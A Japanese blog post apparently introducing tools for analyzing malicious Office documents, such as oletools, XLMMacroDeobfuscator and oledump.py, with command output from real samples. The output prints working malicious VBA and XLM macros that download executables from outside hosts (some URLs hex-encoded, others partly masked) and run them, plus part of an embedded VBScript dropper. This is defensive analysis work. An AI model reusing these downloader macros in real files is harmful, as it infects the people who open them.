14
20

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

More than 1 year has passed since last update.

怪しいOfficeファイルの調査に使えるツール

Last updated at Posted at 2022-04-15

EmotetやQakbotなどのOfficeファイルのマルウェアが増えてきたので、Officeファイルの解析に使えそうなツールを紹介する。

oletools

OLEファイルの解析に使えるいろんなツールのパッケージみたいなもの。
Pythonで動いており、pipを使ってインストールできる。
全部のツールを説明すると長くなるため、一部紹介する。

oleid

OLEファイルに怪しい部分がないか調査してくれる。

cmd.exe
C:\Users\masaomi\Downloads>oleid sample.xls
oleid 0.60.dev1 - http://decalage.info/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues

Filename: sample.xls
--------------------+--------------------+----------+--------------------------
Indicator           |Value               |Risk      |Description
--------------------+--------------------+----------+--------------------------
File format         |MS Excel 97-2003    |info      |
                    |Workbook or Template|          |
--------------------+--------------------+----------+--------------------------
Container format    |OLE                 |info      |Container type
--------------------+--------------------+----------+--------------------------
Application name    |Microsoft Excel     |info      |Application name declared
                    |                    |          |in properties
--------------------+--------------------+----------+--------------------------
Properties code page|1252: ANSI Latin 1; |info      |Code page used for
                    |Western European    |          |properties
                    |(Windows)           |          |
--------------------+--------------------+----------+--------------------------
Encrypted           |False               |none      |The file is not encrypted
--------------------+--------------------+----------+--------------------------
VBA Macros          |Yes, suspicious     |HIGH      |This file contains VBA
                    |                    |          |macros. Suspicious
                    |                    |          |keywords were found. Use
                    |                    |          |olevba and mraptor for
                    |                    |          |more info.
--------------------+--------------------+----------+--------------------------
XLM Macros          |No                  |none      |This file does not contain
                    |                    |          |Excel 4/XLM macros.
--------------------+--------------------+----------+--------------------------
External            |0                   |none      |External relationships
Relationships       |                    |          |such as remote templates,
                    |                    |          |remote OLE objects, etc
--------------------+--------------------+----------+--------------------------

olevba

VBAマクロのコードを抽出し、怪しい部分がないか調査してくれる。

cmd.exe
C:\Users\masaomi\Downloads>olevba sample.xls
olevba 0.60 on Python 3.8.10 - http://decalage.info/python/oletools
===============================================================================
FILE: sample.xls
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO Sheet1.cls
in file: sample.xls - OLE stream: '_VBA_PROJECT_CUR/VBA/Sheet1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Sheet2.cls
in file: sample.xls - OLE stream: '_VBA_PROJECT_CUR/VBA/Sheet2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub Workbook_BeforeClose(Cancel As Boolean)
    With ActiveSheet
        Dim Prog As String

        For Each c In .Comments
            If InStr(4, c.Text, "W", 1) Then
                Prog = c.Text
                CreateObject(c.Text).UILevel = 2
            End If

            If InStr(4, c.Text, ":", 1) Then
                CreateObject(Prog).InstallProduct c.Text
            End If
        Next
    End With
End Sub

-------------------------------------------------------------------------------
VBA MACRO xlm_macro.txt
in file: xlm_macro - OLE stream: 'xlm_macro'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visibl
e -  Sheet

+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|AutoExec  |Workbook_BeforeClose|Runs when the Excel Workbook is closed       |
|Suspicious|CreateObject        |May create an OLE object                     |
|Suspicious|Hex Strings         |Hex-encoded strings were detected, may be    |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
+----------+--------------------+---------------------------------------------+

oleobj

OLEファイル内のオブジェクトを抽出することができる。

cmd.exe
C:¥Users¥masaomi¥Downloads>oleobj sample.xlsm
oleobj 0.56.1 - http://decalage.info/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues

-------------------------------------------------------------------------------
File: 'sample.xlsm'
Found relationship 'hyperlink' with external link hxxps://○○○.com/wp-admin/A
8/%22,%22
Found relationship 'hyperlink' with external link hxxp://○○○.com/replace/
fVea/%22,%22
Found relationship 'hyperlink' with external link hxxp://○○○.com/ren
ew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/%22,%22
Found relationship 'hyperlink' with external link hxxp://www.○○○.com/wp-cont
ent/Y/%22,%22
Found relationship 'hyperlink' with external link hxxp://www.○○○.com/
thegrandbrands/eGd55tEm9qkPNOhViP/%22,%22
Found relationship 'hyperlink' with external link hxxp://www.○○○.com/
wp-includes/HLDoANj/%22,%22

※URLの一部を置き換えています。

rtfobj

RTFファイル内のオブジェクトを抽出することができる。

cmd.exe
C:\Users\masaomi\Downloads>rtfobj sample.doc
rtfobj 0.60 on Python 3.8.10 - http://decalage.info/python/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues

===============================================================================
File: 'sample.doc' - size: 223241 bytes
---+----------+---------------------------------------------------------------
id |index     |OLE Object
---+----------+---------------------------------------------------------------
0  |0000095Dh |format_id: 2 (Embedded)
   |          |class name: b'package'
   |          |data size: 15717
   |          |OLE Package object:
   |          |Filename: 'abdtfhgYgeghDp\x8d.scT'
   |          |Source path: 'C:\\nsdsTggH\\abdtfhgYgeghDp\x8d.scT'
   |          |Temp path = 'C:\\CekepaD\x87\\abdtfhgYgeghDp\x8d.scT'
   |          |MD5 = '789d9c850c8dc9bdeb4a89df5fbab578'
   |          |EXECUTABLE FILE
   |          |File Type: Unknown file type
---+----------+---------------------------------------------------------------
1  |00008A01h |format_id: 2 (Embedded)
   |          |class name: b'OLE2LInk'
   |          |data size: 2560
   |          |MD5 = 'a2665c0164f8e68c32273b9b696d9d9e'
   |          |CLSID: 00000300-0000-0000-C000-000000000046
   |          |StdOleLink (embedded OLE object - Known Related to
   |          |CVE-2017-0199, CVE-2017-8570, CVE-2017-8759 or CVE-2018-8174)
---+----------+---------------------------------------------------------------

olebrowse

OLEファイルのデータストリームをGUIで表示してくれる。
スクリーンショット 2022-04-10 15.51.07.png
スクリーンショット 2022-04-10 15.53.12.png

SSView

OLEファイルのデータストリームを表示したり、編集したりすることができるツール。
埋め込まれている画像やHTMLなども表示してくれる。
スクリーンショット 2022-04-10 16.18.45.png
スクリーンショット 2022-04-10 16.19.57.png
スクリーンショット 2022-04-10 16.21.16.png

pcodedmp/pcode2code

VBAマクロのコードをpcodedmpは逆アセンブル、pcode2codeは逆コンパイルしてくれる。

pcodedmp

cmd.exe
C:\Users\masaomi\Downloads>pcodedmp sample.xls
Processing file: sample.xls
===============================================================================
dir stream: _VBA_PROJECT_CUR/VBA/dir
-------------------------------------------------------------------------------
dir stream after decompression:
1358 bytes
dir stream parsed:
00000000:  PROJ_SYSKIND:
00000000   01 00 00 00                                        ....

0000000A:  PROJ_LCID:
00000000   09 04 00 00                                        ....

00000014:  PROJ_LCIDINVOKE:
00000000   09 04 00 00                                        ....

0000001E:  PROJ_CODEPAGE:
00000000   E4 04                                              ..

00000026:  PROJ_NAME:
00000000   56 42 41 50 72 6F 6A 65 63 74                      VBAProject

00000036:  PROJ_DOCSTRING
0000003C:  PROJ_UNICODE_DOCSTRING
00000042:  PROJ_HELPFILE
00000048:  PROJ_UNICODE_HELPFILE
0000004E:  PROJ_HELPCONTEXT:
00000000   00 00 00 00                                        ....

00000058:  PROJ_LIBFLAGS:
00000000   00 00 00 00                                        ....

00000062:  PROJ_VERSION:
00000000   58 FF 4F 64 0D 00                                  X.Od..

0000006E:  PROJ_CONSTANTS
00000074:  PROJ_UNICODE_CONSTANTS
0000007A:  PROJ_REFNAME_PROJ:
00000000   73 74 64 6F 6C 65                                  stdole

00000086:  PROJ_UNICODE_REFNAME_PROJ:
00000000   73 00 74 00 64 00 6F 00 6C 00 65 00                s.t.d.o.l.e.

00000098:  PROJ_LIBID_REGISTERED:
00000000   5E 00 00 00 2A 5C 47 7B 30 30 30 32 30 34 33 30    ^...*\G{00020430
00000010   2D 30 30 30 30 2D 30 30 30 30 2D 43 30 30 30 2D    -0000-0000-C000-
00000020   30 30 30 30 30 30 30 30 30 30 34 36 7D 23 32 2E    000000000046}#2.
00000030   30 23 30 23 43 3A 5C 57 69 6E 64 6F 77 73 5C 53    0#0#C:\Windows\S
00000040   79 73 57 4F 57 36 34 5C 73 74 64 6F 6C 65 32 2E    ysWOW64\stdole2.
00000050   74 6C 62 23 4F 4C 45 20 41 75 74 6F 6D 61 74 69    tlb#OLE Automati
00000060   6F 6E 00 00 00 00 00 00                            on......

00000106:  PROJ_REFNAME_PROJ:
00000000   4F 66 66 69 63 65                                  Office

00000112:  PROJ_UNICODE_REFNAME_PROJ:
00000000   4F 00 66 00 66 00 69 00 63 00 65 00                O.f.f.i.c.e.

00000124:  PROJ_LIBID_REGISTERED:
00000000   9A 00 00 00 2A 5C 47 7B 32 44 46 38 44 30 34 43    ....*\G{2DF8D04C
00000010   2D 35 42 46 41 2D 31 30 31 42 2D 42 44 45 35 2D    -5BFA-101B-BDE5-
00000020   30 30 41 41 30 30 34 34 44 45 35 32 7D 23 32 2E    00AA0044DE52}#2.
00000030   30 23 30 23 43 3A 5C 50 72 6F 67 72 61 6D 20 46    0#0#C:\Program F
00000040   69 6C 65 73 20 28 78 38 36 29 5C 43 6F 6D 6D 6F    iles (x86)\Commo
00000050   6E 20 46 69 6C 65 73 5C 4D 69 63 72 6F 73 6F 66    n Files\Microsof
00000060   74 20 53 68 61 72 65 64 5C 4F 46 46 49 43 45 31    t Shared\OFFICE1
00000070   32 5C 4D 53 4F 2E 44 4C 4C 23 4D 69 63 72 6F 73    2\MSO.DLL#Micros
00000080   6F 66 74 20 4F 66 66 69 63 65 20 31 32 2E 30 20    oft Office 12.0 
00000090   4F 62 6A 65 63 74 20 4C 69 62 72 61 72 79 00 00    Object Library..
000000A0   00 00 00 00                                        ....

以下省略

-dをつけると、p-codeのみが逆アセンブルされる。

cmd.exe
C:\Users\masaomi\Downloads>pcodedmp -d sample.xls
Processing file: sample.xls
===============================================================================
Module streams:
_VBA_PROJECT_CUR/VBA/ThisWorkbook - 3553 bytes
Line #0:
	FuncDefn (Private Sub jkmyjkgeozuikp())
Line #1:
	Dim 
	VarDefn abzpluxvhrslhaqrd (As String)
Line #2:
	Dim 
	VarDefn dzclesss (As String)
Line #3:
	Dim 
	VarDefn aemngpsicijyqastoqi (As Object)
	VarDefn oklqeyqirsr (As Object)
Line #4:
	Dim 
	VarDefn zuqxesnr (As Integer)
Line #5:
	LitStr 0x003E "68747470733a2f2f7472616e736665722e73682f796c6a7548752f30303031"
	ArgsLd ggwyizkwoeai 0x0001 
	LitStr 0x0016 "4b4c43323032322e657865"
	ArgsLd ggwyizkwoeai 0x0001 
	Concat 
	St abzpluxvhrslhaqrd

以下省略

pcode2code

pcode2codeはpcodedmpの出力をもとに、VBAマクロのコードを逆コンパイルしている。

cmd.exe
C:\Users\masaomi\Downloads>pcode2code sample.xls
stream : _VBA_PROJECT_CUR/VBA/ThisWorkbook - 3553 bytes

########################################



Private Sub jkmyjkgeozuikp()

  Dim abzpluxvhrslhaqrd As String

  Dim dzclesss As String

  Dim aemngpsicijyqastoqi As Object, oklqeyqirsr As Object

  Dim zuqxesnr As Integer

  abzpluxvhrslhaqrd = ggwyizkwoeai("68747470733a2f2f7472616e736665722e73682f796c6a7548752f30303031") & ggwyizkwoeai("4b4c43323032322e657865")

  dzclesss = ggwyizkwoeai("6b") & ggwyizkwoeai("6c632e657865")

  dzclesss = Environ("TEMP") & "\" & dzclesss

  Set aemngpsicijyqastoqi = CreateObject(ggwyizkwoeai("4d53584d4c322e536572766572") & ggwyizkwoeai("584d4c485454502e362e30"))

  aemngpsicijyqastoqi.setOption(2) = 13056

  aemngpsicijyqastoqi.Open ggwyizkwoeai("474554"), abzpluxvhrslhaqrd, False

  aemngpsicijyqastoqi.setRequestHeader ggwyizkwoeai("557365") & ggwyizkwoeai("722d4167656e74"), ggwyizkwoeai("4d6f7a69") & ggwyizkwoeai("6c6c612f342e302028636f6d70617469626c653b204d53494520362e303b2057696e646f7773204e5420352e3029")

  aemngpsicijyqastoqi.Send

  If aemngpsicijyqastoqi.Status = 200 Then

    Set oklqeyqirsr = CreateObject(ggwyizkwoeai("41") & ggwyizkwoeai("444f44422e53747265616d"))

    oklqeyqirsr.Open

    oklqeyqirsr.Type = 1

    oklqeyqirsr.Xor aemngpsicijyqastoqi.ResponseBody

    oklqeyqirsr.SaveToFile dzclesss, 2

    oklqeyqirsr.Close

    mxjnxrbn dzclesss

  End If

End Sub

以下省略

XLMMacroDeobfuscator

難読化されたXLMマクロのデコードしてくれるツール
oletoolsにも内包されている。

cmd.exe
C:\Users\masaomi\Downloads>xlmdeobfuscator --file sample.xls

          _        _______
|\     /|( \      (       )
( \   / )| (      | () () |
 \ (_) / | |      | || || |
  ) _ (  | |      | |(_)| |
 / ( ) \ | |      | |   | |
( /   \ )| (____/\| )   ( |
|/     \|(_______/|/     \|
   ______   _______  _______  ______   _______           _______  _______  _____
__ _________ _______  _______
  (  __  \ (  ____ \(  ___  )(  ___ \ (  ____ \|\     /|(  ____ \(  ____ \(  ___
  )\__   __/(  ___  )(  ____ )
  | (  \  )| (    \/| (   ) || (   ) )| (    \/| )   ( || (    \/| (    \/| (
) |   ) (   | (   ) || (    )|
  | |   ) || (__    | |   | || (__/ / | (__    | |   | || (_____ | |      | (___
) |   | |   | |   | || (____)|
  | |   | ||  __)   | |   | ||  __ (  |  __)   | |   | |(_____  )| |      |  ___
  |   | |   | |   | ||     __)
  | |   ) || (      | |   | || (  \ \ | (      | |   | |      ) || |      | (
) |   | |   | |   | || (\ (
  | (__/  )| (____/\| (___) || )___) )| )      | (___) |/\____) || (____/\| )
( |   | |   | (___) || ) \ \__
  (______/ (_______/(_______)|/ \___/ |/       (_______)\_______)(_______/|/
 \|   )_(   (_______)|/   \__/


XLMMacroDeobfuscator(v0.2.5) - https://github.com/DissectMalware/XLMMacroDeobfus
cator

File: C:\Users\masaomi\Downloads\sample.xls

Unencrypted xls file

[Loading Cells]
auto_open: auto_open->'EGVEB'!$D$1
[Starting Deobfuscation]
CELL:D5        , FullEvaluation      , "False"
CELL:D9        , FullEvaluation      , CALL("urlmon","URLDownloadToFileA,JJCCBB"
,0,"hxxp://○○○.com/wp-content/Cw3aR6792f/","..\nhth.dll",0,0)
CELL:D11       , FullEvaluation      , IF(UJFD1<0,CALL("urlmon","URLDownloadToFi
leA,JJCCBB",0,"h"&"tt"&"p:/"&"/○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○
"&"○"&"○"&"○"&"○.○"&"○"&"○/i"&"n"&"v"&"o"&"i"&"c"&"e/"&"m/","..\nhth.dll",0,0))
CELL:D13       , FullEvaluation      , IF(UJFD2<0,CALL("urlmon","URLDownloadToFi
leA,JJCCBB",0,"h"&"tt"&"p:/"&"/○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○
.○"&"○"&"○/d"&"o"&"w"&"n"&"l"&"o"&"a"&"d"&"s/8"&"d"&"R9"&"p"&"g"&"N"&"B"&"F"&"t"
&"z/","..\nhth.dll",0,0))
CELL:D15       , FullEvaluation      , IF(UJFD3<0,CALL("urlmon","URLDownloadToFi
leA,JJCCBB",0,"h"&"t"&"tp"&"s:/"&"/○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○
"&"○"&"○"&"○"&"○.○"&"○"&"○/w"&"p-in"&"clu"&"de"&"s/v"&"2"&"q"&"F"&"A"&"l"&"M"&"
Z"&"E"&"L"&"R"&"k"&"xb"&"z/","..\nhth.dll",0,0))
CELL:D17       , FullEvaluation      , IF(UJFD4<0,CALL("urlmon","URLDownloadToFi
leA,JJCCBB",0,"h"&"tt"&"p:/"&"/○"&"○"&"○"&"○"&"○"&"○.○"&"○"&"○"&"○"&"○"&"○"&"○"&
"○.○"&"○"&"○/w"&"p-c"&"o"&"n"&"t"&"e"&"n"&"t/s"&"S"&"J"&"q"&"J/","..\nhth.dll",0
,0))
CELL:D19       , FullEvaluation      , IF(UJFD5<0,CALL("urlmon","URLDownloadToFi
leA,JJCCBB",0,"h"&"tt"&"p:/"&"/○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○.○"&"○"&"○/w
"&"p-i"&"n"&"cl"&"u"&"d"&"e"&"s/T"&"5"&"q"&"X"&"A"&"R"&"8"&"p"&"5/","..\nhth.dll
",0,0))
CELL:D23       , FullEvaluation      , IF(UJFD6<0,CLOSE(0),)
CELL:D25       , PartialEvaluation   , =EXEC("C:\Windows\SysWow64\regsvr32.exe -
s ..\nhth.dll")
CELL:D29       , FullEvaluation      , RETURN()

Files:

[END of Deobfuscation]
time elapsed: 0.2964000701904297

※URL及び文字列の一部を置き換えています。

DidierStevensSuite

いろんなものの解析に役に立つツールのパッケージみたいなもの。
この中から、Officeファイルの解析に役に立ちそうなものを一部紹介する。

oledump.py

OLEファイルの解析をしてくれる。
オプションを付けずにそのまま実行すると、データストリームの一覧を表示する。
Mやmが付いている番号はマクロがあることを示している。
Attribute文やOptions文以外の文があるとMになり、ないとmになる。

cmd.exe
C:¥Users¥masaomi¥Downloads¥DidierStevensSuite>oledump.py sample.xls
  1:       102 '¥x01CompObj'
  2:       236 '¥x05DocumentSummaryInformation'
  3:       180 '¥x05SummaryInformation'
  4:     16381 'Workbook'
  5:       449 '_VBA_PROJECT_CUR/PROJECT'
  6:        77 '_VBA_PROJECT_CUR/PROJECTwm'
  7:      2813 '_VBA_PROJECT_CUR/VBA/_VBA_PROJECT'
  8:      1545 '_VBA_PROJECT_CUR/VBA/__SRP_0'
  9:       155 '_VBA_PROJECT_CUR/VBA/__SRP_1'
 10:       170 '_VBA_PROJECT_CUR/VBA/__SRP_2'
 11:       170 '_VBA_PROJECT_CUR/VBA/__SRP_3'
 12: M    1345 '_VBA_PROJECT_CUR/VBA/abdfiihow'
 13:       563 '_VBA_PROJECT_CUR/VBA/dir'
 14: m     990 '_VBA_PROJECT_CUR/VBA/Лист1'
 15: M    2375 '_VBA_PROJECT_CUR/VBA/ЭтаКнига'

「-s ストリーム番号」をつけると対象のストリームの中身を見ることができる。

cmd.exe
C:\Users\masaomi\Downloads\DidierStevensSuite>oledump.py -s 1 sample.xls
00000000: 01 00 FE FF 03 0A 00 00  FF FF FF FF 20 08 02 00  ............ ...
00000010: 00 00 00 00 C0 00 00 00  00 00 00 46 1A 00 00 00  ...........F....
00000020: CB E8 F1 F2 20 4D 69 63  72 6F 73 6F 66 74 20 45  .... Microsoft E
00000030: 78 63 65 6C 20 32 30 30  33 00 06 00 00 00 42 69  xcel 2003.....Bi
00000040: 66 66 38 00 0E 00 00 00  45 78 63 65 6C 2E 53 68  ff8.....Excel.Sh
00000050: 65 65 74 2E 38 00 F4 39  B2 71 00 00 00 00 00 00  eet.8..9.q......
00000060: 00 00 00 00 00 00                                 ......

また、「-S」を追加すると文字列だけ抽出できる。

cmd.exe
C:\Users\masaomi\Downloads\DidierStevensSuite>oledump.py -s 1 -S sample.xls
 Microsoft Excel 2003
Biff8
Excel.Sheet.8

「-v」を追加すると、VBAマクロを表示してくれる。

cmd.exe
C:\Users\masaomi\Downloads\DidierStevensSuite>oledump.py -s 15 -v sample.xls
Attribute VB_Name = "????????"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
Application.ScreenUpdating = False
Dim xHttp: Set jgccsmkbfbunzevjs = CreateObject(rkixcetefmdfoip("4d6963726f736f6
6742e584d") & rkixcetefmdfoip("4c48545450"))
Dim bStrm: Set ecxtnnvma = CreateObject(rkixcetefmdfoip("41646f64") & rkixcetefm
dfoip("622e53747265616d"))
jgccsmkbfbunzevjs.Open rkixcetefmdfoip("474554"), rkixcetefmdfoip("687474703a")
& rkixcetefmdfoip("2f2f3136382e3130302e382e34322f737069736f6b2e657865"), False
jgccsmkbfbunzevjs.Send
Dim leicqooi As String
leicqooi = Environ("AppData")
With ecxtnnvma
.Type = 1
.Open
.write jgccsmkbfbunzevjs.responseBody
.savetofile leicqooi & rkixcetefmdfoip("5c72756e73782e65") & rkixcetefmdfoip("78
65"), 2
End With
Shell (leicqooi & rkixcetefmdfoip("5c72") & rkixcetefmdfoip("756e73782e657865"))

Application.ScreenUpdating = True
End Sub

rtfdump.py

RTFファイルを解析してくれる。
オプションとかはoledump.pyに似ている。

cmd.exe
C:\Users\masaomi\Documents\DidierStevensSuite>rtfdump.py sample.doc
    1 Level  1        c=    7 p=00000000 l=  223239 h=  219001;  135857 b=
 0   u=     292 \rtf
    2  Level  2       c=    0 p=000000b2 l=    1644 h=     158;      23 b=
 0   u=     203 \lsdlockedexcept
    3  Level  2       c=    1 p=000007e6 l=     177 h=      34;       8 b=
 0   u=      65 \rtlch
    4   Level  3      c=    0 p=00000877 l=      17 h=       6;       2 b=
 0   u=       7 \b
    5  Level  2       c=    2 p=000008ab l=   32939 h=   31514;     286 b=
 0 O u=       0 \object
      Name: b'package\x00' Size: 15717 md5: a47631a4dcc39d2f2704709899b91cf6 mag
ic: 02006162
    6   Level  3      c=    0 p=000008bf l=     145 h=       0;      10 b=
 0   u=       0 \objw1
    7   Level  3      c=    0 p=00000954 l=   32761 h=   31514;     286 b=
 0 O u=       0 \objdata
      Name: b'package\x00' Size: 15717 md5: a47631a4dcc39d2f2704709899b91cf6 mag
ic: 02006162
    8  Level  2       c=    2 p=00008958 l=    5442 h=    5270;    4154 b=
 0   u=      14 \object
    9   Level  3      c=    0 p=00008967 l=      27 h=       5;       1 b=
 0   u=      10 \*\objclass Word.Document.8
   10   Level  3      c=    1 p=00008984 l=    5397 h=    5267;    4154 b=
 0   u=       4 \objdat
   11    Level  4     c=    2 p=0000898e l=    5386 h=    5265;    4154 b=
 0 O u=       4 \dptxbxtext
      Name: b'OLE2LInk\x00' Size: 2560 md5: a2665c0164f8e68c32273b9b696d9d9e mag
ic: d0cf11e0
   12     Level  5    c=    0 p=000089dd l=       6 h=       0;       0 b=
 0   u=       2 \ud
   13     Level  5    c=    0 p=000089ef l=       6 h=       0;       0 b=
 0   u=       2 \ud
   14  Level  2       c=    1 p=00009e9e l=   24862 h=   24599;   24595 b=
 0   u=      10 \shprslt
   15   Level  3      c=    1 p=00009ea7 l=   24852 h=   24599;   24595 b=
 0   u=      10 \*\do
   16    Level  4     c=    1 p=00009ed5 l=   24805 h=   24599;   24595 b=
 0   u=      10 \dptxbxtext
   17     Level  5    c=    1 p=00009f1e l=   24731 h=   24599;   24595 b=
 0   u=      10 \pard
   18      Level  6   c=    2 p=00009f5c l=   24668 h=   24599;   24595 b=
 0   u=      10 \object
   19       Level  7  c=    0 p=00009f7f l=      26 h=       4;       1 b=
 0   u=      10 \*\objclass Word.Picture.8
   20       Level  7  c=    0 p=00009f9b l=   24604 h=   24596;   24595 b=
 0   u=       1 \objda
   21  Level  2       c=    1 p=0000ffbe l=   21693 h=   21537;   21537 b=
 0   u=       0 \pict
   22   Level  3      c=    0 p=0001004e l=   21548 h=   21537;   21537 b=
 0   u=       0 \*\blipuid
   23  Level  2       c=    1 p=0001547d l=  136071 h=  135889;  135857 b=
 0   u=       0 \nonshppict
   24   Level  3      c=    1 p=00015489 l=  136058 h=  135889;  135857 b=
 0   u=       0 \pict
   25    Level  4     c=    0 p=00015526 l=      43 h=      32;      32 b=
 0   u=       0 \*\blipuid

「-O」をつけるとオブジェクトがあるものだけ表示する。

cmd.exe
C:\Users\masaomi\Documents\DidierStevensSuite>rtfdump.py -O sample.doc
1: Name: b'package\x00'
   Magic: b'02006162'
   Size: 15717
   Hash: md5 a47631a4dcc39d2f2704709899b91cf6
2: Name: b'OLE2LInk\x00'
   Magic: b'd0cf11e0'
   Size: 2560
   Hash: md5 a2665c0164f8e68c32273b9b696d9d9e

「-s ストリーム番号」をつけると対象のストリームの中身を見ることができる。

cmd.exe
C:\Users\masaomi\Documents\DidierStevensSuite>rtfdump.py -s 3 sample.doc
00000000: 5C 66 63 73 31 20 5C 61  66 33 31 35 30 37 20 5C  \fcs1 \af31507 \
00000010: 6C 74 72 63 68 5C 66 63  73 30 20 5C 69 6E 73 72  ltrch\fcs0 \insr
00000020: 73 69 64 34 39 33 32 35  39 33 20 0D 0A 4D 69 63  sid4932593 ..Mic
00000030: 72 6F 73 6F 66 74 20 4F  66 66 69 63 65 20 64 6F  rosoft Office do
00000040: 65 73 20 6E 6F 74 20 77  6F 72 6B 20 69 6E 20 65  es not work in e
00000050: 6D 61 69 6C 20 50 72 65  76 69 65 77 2E 5C 6C 69  mail Preview.\li
00000060: 6E 65 20 50 6C 65 61 73  65 20 64 6F 77 6E 6C 6F  ne Please downlo
00000070: 61 64 20 74 68 65 20 64  6F 63 75 6D 65 6E 74 20  ad the document
00000080: 61 6E 64 20 63 6C 69 63  6B 20 7B 5C 62 20 45 6E  and click {\b En
00000090: 61 62 6C 65 20 45 64 69  74 69 6E 67 7D 20 77 68  able Editing} wh
000000A0: 65 6E 20 6F 70 65 6E 69  6E 67 2E                 en opening.

また、「-H」を追加するとデコードしてくれる。

cmd.exe
C:\Users\masaomi\Documents\DidierStevensSuite>rtfdump.py -s 7 -H sample.doc
00000000: 01 05 00 00 02 00 00 00  08 00 00 00 70 61 63 6B  ............pack
00000010: 61 67 65 00 00 00 00 00  00 00 00 00 65 3D 00 00  age.........e=..
00000020: 02 00 61 62 64 74 66 68  67 59 67 65 67 68 44 70  ..abdtfhgYgeghDp
00000030: 8D 2E 73 63 54 00 43 3A  5C 6E 73 64 73 54 67 67  ..scT.C:\nsdsTgg
00000040: 48 5C 61 62 64 74 66 68  67 59 67 65 67 68 44 70  H\abdtfhgYgeghDp
00000050: 8D 2E 73 63 54 00 00 00  03 00 20 00 00 00 43 3A  ..scT..... ...C:
00000060: 5C 43 65 6B 65 70 61 44  87 5C 61 62 64 74 66 68  \CekepaD.\abdtfh
00000070: 67 59 67 65 67 68 44 70  8D 2E 73 63 54 00 9E 78  gYgeghDp..scT..x
00000080: 00 00 0D 0A 3C 73 63 72  69 70 74 6C 65 54 0D 0A  ....<scriptleT..
00000090: 20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 3E                 >
000000A0: 0D 0A 3C 73 63 72 69 70  74 20 6C 61 6E 67 75 61  ..<script langua
000000B0: 67 65 20 3D 20 27 76 62  73 63 72 69 70 74 27 3E  ge = 'vbscript'>
000000C0: 0D 0A 0D 0A 66 73 64 66  64 73 66 73 20 3D 20 22  ....fsdfdsfs = "
000000D0: 61 48 52 30 55 44 6F 76  4C 33 64 6C 62 47 78 6A  aHR0UDovL3dlbGxj
000000E0: 59 57 78 73 63 79 35 6A  62 32 30 76 55 6D 56 6C  YWxscy5jb20vUmVl
000000F0: 62 47 5A 79 59 57 31 6C  4C 6D 56 34 5A 51 3D 3D  bGZyYW1lLmV4ZQ==
00000100: 22 20 27 6E 63 6D 78 62  36 35 37 34 0D 0A 79 75  " 'ncmxb6574..yu
00000110: 6C 6B 79 74 6A 74 72 68  74 6A 72 6B 64 73 61 72  lkytjtrhtjrkdsar
00000120: 6A 6B 79 20 3D 22 55 6D  56 6C 62 47 5A 79 59 57  jky ="UmVlbGZyYW
00000130: 31 6C 4C 6D 56 34 5A 51  3D 3D 22 20 27 6E 63 6D  1lLmV4ZQ==" 'ncm
00000140: 78 62 36 35 37 34 0D 0A  0D 0A 6D 6A 66 76 79 67  xb6574....mjfvyg
00000150: 67 68 65 62 6A 74 65 66  20 3D 20 22 62 22 0D 0A  ghebjtef = "b"..
00000160: 77 73 6C 61 75 73 66 79  63 68 6B 73 20 3D 20 6D  wslausfychks = m
00000170: 6A 66 76 79 67 67 68 65  62 6A 74 65 66 20 2B 20  jfvygghebjtef +
00000180: 22 69 6E 22 0D 0A 77 73  6C 61 75 73 66 79 63 68  "in"..wslausfych
00000190: 6B 73 20 3D 20 77 73 6C  61 75 73 66 79 63 68 6B  ks = wslausfychk
000001A0: 73 20 2B 20 22 2E 22 0D  0A 77 73 6C 61 75 73 66  s + "."..wslausf
000001B0: 79 63 68 6B 73 20 3D 20  77 73 6C 61 75 73 66 79  ychks = wslausfy
000001C0: 63 68 6B 73 20 2B 20 6D  6A 66 76 79 67 67 68 65  chks + mjfvygghe
000001D0: 62 6A 74 65 66 0D 0A 77  73 6C 61 75 73 66 79 63  bjtef..wslausfyc
000001E0: 68 6B 73 20 3D 20 77 73  6C 61 75 73 66 79 63 68  hks = wslausfych
000001F0: 6B 73 20 2B 20 22 61 22  0D 0A 77 73 6C 61 75 73  ks + "a"..wslaus
00000200: 66 79 63 68 6B 73 20 3D  20 77 73 6C 61 75 73 66  fychks = wslausf
00000210: 79 63 68 6B 73 20 2B 20  22 73 22 0D 0A 77 73 6C  ychks + "s"..wsl
00000220: 61 75 73 66 79 63 68 6B  73 20 3D 20 77 73 6C 61  ausfychks = wsla
00000230: 75 73 66 79 63 68 6B 73  20 2B 20 22 65 22 0D 0A  usfychks + "e"..
00000240: 77 73 6C 61 75 73 66 79  63 68 6B 73 20 3D 20 77  wslausfychks = w
00000250: 73 6C 61 75 73 66 79 63  68 6B 73 20 2B 20 22 36  slausfychks + "6
00000260: 22 0D 0A 77 73 6C 61 75  73 66 79 63 68 6B 73 20  "..wslausfychks
00000270: 3D 20 77 73 6C 61 75 73  66 79 63 68 6B 73 20 2B  = wslausfychks +
00000280: 20 22 22 20 2B 20 22 34  22 0D 0A 0D 0A 46 75 6E   "" + "4"....Fun
